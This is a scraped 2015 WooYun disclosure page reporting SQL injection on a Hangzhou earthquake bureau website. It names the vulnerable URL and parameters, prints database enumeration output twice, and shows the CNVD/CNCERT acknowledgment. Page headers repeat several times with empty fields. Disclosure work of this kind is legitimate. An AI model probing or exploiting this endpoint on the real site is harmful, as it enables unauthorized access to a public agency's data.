某市地震局存在SQL注射 | wooyun-2015-095335| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095335

漏洞标题：某市地震局存在SQL注射

漏洞作者：路人甲

提交时间：2015-02-04 12:58

修复时间：2015-03-21 13:00

公开时间：2015-03-21 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-04：细节已通知厂商并且等待厂商处理中
2015-02-09：厂商已经确认，细节仅向厂商公开
2015-02-19：细节向核心白帽子及相关领域专家公开
2015-03-01：细节向普通白帽子公开
2015-03-11：细节向实习白帽子公开
2015-03-21：细节向公众公开

简要描述：

某市地震局存在SQL注射

详细说明：

存在：杭州市地震局
SQL连接：http://www.hzdzj.com/detail.php?title=%B9%AB%B8%E6%C0%B8&id=218&xh=3

available databases [8]:
[*] hzdz
[*] master
[*] model
[*] msdb
[*] Northwind
[*] publish
[*] pubs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.RTblRelships                     | 6910    |
| dbo.RTblIfaceHier                    | 3345    |
| dbo.RTblVersionAdminInfo             | 2328    |
| dbo.RTblVersions                     | 2328    |
| dbo.RTblNamedObj                     | 2191    |
| dbo.RTblIfaceMem                     | 1186    |
| dbo.RTblPropDefs                     | 794     |
| dbo.RTblClassDefs                    | 537     |
| dbo.RTblIfaceDefs                    | 452     |
| dbo.RTblProps                        | 392     |
| dbo.RTblRelColDefs                   | 320     |
| dbo.RTblRelshipDefs                  | 144     |
| dbo.RTblParameterDef                 | 136     |
| dbo.sysconstraints                   | 91      |
| dbo.RTblSites                        | 38      |
| dbo.RTblRelshipProps                 | 28      |
| dbo.syscategories                    | 19      |
| dbo.RTblTypeLibs                     | 16      |
| dbo.backupfile                       | 4       |
| dbo.restorefile                      | 4       |
| dbo.syssegments                      | 3       |
| dbo.backupmediafamily                | 2       |
| dbo.backupmediaset                   | 2       |
| dbo.backupset                        | 2       |
| dbo.restorefilegroup                 | 2       |
| dbo.restorehistory                   | 2       |
| dbo.RTblDatabaseVersion              | 1       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 2501    |
| dbo.spt_values                       | 727     |
| INFORMATION_SCHEMA.ROUTINES          | 705     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.COLUMNS           | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 62      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 34      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 33      |
| dbo.spt_server_info                  | 29      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.VIEWS             | 25      |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 17      |
| dbo.spt_datatype_info_ext            | 10      |
| INFORMATION_SCHEMA.SCHEMATA          | 8       |
| dbo.syssegments                      | 3       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
+--------------------------------------+---------+
Database: hzdz
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.dz_info_eqk                      | 664     |
| dbo.news                             | 478     |
| dbo.answer                           | 395     |
| dbo.result                           | 395     |
| dbo.dz_info_others                   | 206     |
| dbo.dz_file                          | 173     |
| dbo.infon                            | 13      |
| dbo.dz_info_sort                     | 10      |
| dbo.sysconstraints                   | 4       |
| dbo.syssegments                      | 3       |
| dbo.dtest                            | 1       |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended]         | 2155    |
| dbo.[Order Details]                  | 2155    |
| dbo.Invoices                         | 2155    |
| dbo.[Order Subtotals]                | 830     |
| dbo.[Orders Qry]                     | 830     |
| dbo.Orders                           | 830     |
| dbo.[Summary of Sales by Quarter]    | 809     |
| dbo.[Summary of Sales by Year]       | 809     |
| dbo.[Customer and Suppliers by City] | 120     |
| dbo.Customers                        | 91      |
| dbo.[Quarterly Orders]               | 86      |
| dbo.[Product Sales for 1997]         | 77      |
| dbo.[Sales by Category]              | 77      |
| dbo.Products                         | 77      |
| dbo.[Alphabetical list of products]  | 69      |
| dbo.[Current Product List]           | 69      |
| dbo.[Products by Category]           | 69      |
| dbo.[Sales Totals by Amount]         | 66      |
| dbo.Territories                      | 53      |
| dbo.EmployeeTerritories              | 49      |
| dbo.sysconstraints                   | 43      |
| dbo.Suppliers                        | 29      |
| dbo.[Products Above Average Price]   | 25      |
| dbo.Employees                        | 9       |
| dbo.[Category Sales for 1997]        | 8       |
| dbo.Categories                       | 8       |
| dbo.Region                           | 4       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+

漏洞证明：

available databases [8]:
[*] hzdz
[*] master
[*] model
[*] msdb
[*] Northwind
[*] publish
[*] pubs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.RTblRelships                     | 6910    |
| dbo.RTblIfaceHier                    | 3345    |
| dbo.RTblVersionAdminInfo             | 2328    |
| dbo.RTblVersions                     | 2328    |
| dbo.RTblNamedObj                     | 2191    |
| dbo.RTblIfaceMem                     | 1186    |
| dbo.RTblPropDefs                     | 794     |
| dbo.RTblClassDefs                    | 537     |
| dbo.RTblIfaceDefs                    | 452     |
| dbo.RTblProps                        | 392     |
| dbo.RTblRelColDefs                   | 320     |
| dbo.RTblRelshipDefs                  | 144     |
| dbo.RTblParameterDef                 | 136     |
| dbo.sysconstraints                   | 91      |
| dbo.RTblSites                        | 38      |
| dbo.RTblRelshipProps                 | 28      |
| dbo.syscategories                    | 19      |
| dbo.RTblTypeLibs                     | 16      |
| dbo.backupfile                       | 4       |
| dbo.restorefile                      | 4       |
| dbo.syssegments                      | 3       |
| dbo.backupmediafamily                | 2       |
| dbo.backupmediaset                   | 2       |
| dbo.backupset                        | 2       |
| dbo.restorefilegroup                 | 2       |
| dbo.restorehistory                   | 2       |
| dbo.RTblDatabaseVersion              | 1       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 2501    |
| dbo.spt_values                       | 727     |
| INFORMATION_SCHEMA.ROUTINES          | 705     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.COLUMNS           | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 62      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 34      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 33      |
| dbo.spt_server_info                  | 29      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.VIEWS             | 25      |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 17      |
| dbo.spt_datatype_info_ext            | 10      |
| INFORMATION_SCHEMA.SCHEMATA          | 8       |
| dbo.syssegments                      | 3       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
+--------------------------------------+---------+
Database: hzdz
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.dz_info_eqk                      | 664     |
| dbo.news                             | 478     |
| dbo.answer                           | 395     |
| dbo.result                           | 395     |
| dbo.dz_info_others                   | 206     |
| dbo.dz_file                          | 173     |
| dbo.infon                            | 13      |
| dbo.dz_info_sort                     | 10      |
| dbo.sysconstraints                   | 4       |
| dbo.syssegments                      | 3       |
| dbo.dtest                            | 1       |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended]         | 2155    |
| dbo.[Order Details]                  | 2155    |
| dbo.Invoices                         | 2155    |
| dbo.[Order Subtotals]                | 830     |
| dbo.[Orders Qry]                     | 830     |
| dbo.Orders                           | 830     |
| dbo.[Summary of Sales by Quarter]    | 809     |
| dbo.[Summary of Sales by Year]       | 809     |
| dbo.[Customer and Suppliers by City] | 120     |
| dbo.Customers                        | 91      |
| dbo.[Quarterly Orders]               | 86      |
| dbo.[Product Sales for 1997]         | 77      |
| dbo.[Sales by Category]              | 77      |
| dbo.Products                         | 77      |
| dbo.[Alphabetical list of products]  | 69      |
| dbo.[Current Product List]           | 69      |
| dbo.[Products by Category]           | 69      |
| dbo.[Sales Totals by Amount]         | 66      |
| dbo.Territories                      | 53      |
| dbo.EmployeeTerritories              | 49      |
| dbo.sysconstraints                   | 43      |
| dbo.Suppliers                        | 29      |
| dbo.[Products Above Average Price]   | 25      |
| dbo.Employees                        | 9       |
| dbo.[Category Sales for 1997]        | 8       |
| dbo.Categories                       | 8       |
| dbo.Region                           | 4       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-02-09 10:46

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给浙江分中心，由其后续协助调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095335

漏洞标题：某市地震局存在SQL注射

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-02-04 12:58

修复时间：2015-03-21 13:00

公开时间：2015-03-21 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095335

漏洞标题：某市地震局存在SQL注射

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-02-04 12:58

修复时间：2015-03-21 13:00

公开时间：2015-03-21 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-095335"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云